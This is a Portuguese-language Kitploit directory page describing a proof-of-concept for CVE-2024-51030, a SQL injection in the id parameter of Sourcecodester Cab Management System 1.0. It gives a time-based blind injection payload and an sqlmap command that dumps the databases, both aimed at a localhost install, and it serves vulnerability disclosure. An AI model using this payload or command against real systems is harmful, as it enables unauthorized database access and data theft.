Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-51030 — Exploração de prova de conceito para injeção de SQL no Sourcecodester Cab Management System 1.0, demonstrando execução arbitrária de SQL via parâmetro id em manage_client.php e view_cab.php. | Kitploit
Ferramentas/GitHubGitHub/vighneshnair7/cve-2024-51030
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoSegurança de Banco de Dados
GitHubvighneshnair7/cve-2024-51030

CVE-2024-51030

Exploração de prova de conceito para injeção de SQL no Sourcecodester Cab Management System 1.0, demonstrando execução arbitrária de SQL via parâmetro id em manage_client.php e view_cab.php.

Ver Repositório
12há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-51030

Descrição

Uma vulnerabilidade de injeção de SQL em manage_client.php e view_cab.php do Sourcecodester Cab Management System 1.0 permite que atacantes remotos executem comandos SQL arbitrários por meio do parâmetro id, levando a acesso não autorizado e potencial comprometimento de dados sensíveis dentro do banco de dados.

Tipo de Vulnerabilidade

Injeção de SQL

Fornecedor do Produto

Sourcecodester

Base do Código do Produto Afetado:

https://www.sourcecodester.com/php/15180/cab-management-system-phpoop-free-source-code.html - 1.0

Componente Afetado:

O Sourcecodester Cab Management System v1.0 é vulnerável a injeção de SQL por meio do parâmetro id nas páginas manage_client.php e view_cab.php.

Vetores de Ataque:

  1. Configure o aplicativo localmente e faça login usando as credenciais administrativas padrão fornecidas ou você também pode entrar usando um usuário administrador com privilégios baixos, como (staff).
  • Agora, navegue até a seguinte URL no seu navegador: http://localhost/cms/admin/?page=clients/manage_client&id=1
  • Injete o Payload SQL: Modifique o parâmetro id na URL para incluir um payload de injeção de SQL cego baseado em booleano ou baseado em tempo:- http://localhost/cms/admin/?page=clients/manage_client&id=1%27%20AND%20(SELECT%202085%20FROM%20(SELECT(SLEEP(5)))LxyK)--%20mvKJ
  • Observe a Resposta do Aplicativo: A página deve demorar visivelmente mais (5 segundos) para carregar se a injeção for bem-sucedida, confirmando que o parâmetro id é vulnerável a injeção de SQL.
  • Agora use a ferramenta SQLMap para exploração adicional e extração de bancos de dados usando o comando abaixo: sqlmap -u "http://localhost/cms/admin/?page=clients/manage_client&id=1" -p id --dbms mysql --cookie="PHPSESSID=your_cookie" --risk 3 --level 4 --dbs --dump
  • Referência:

    1. https://owasp.org/www-community/attacks/SQL_Injection
    2. https://portswigger.net/web-security/sql-injection
    Baixar ferramenta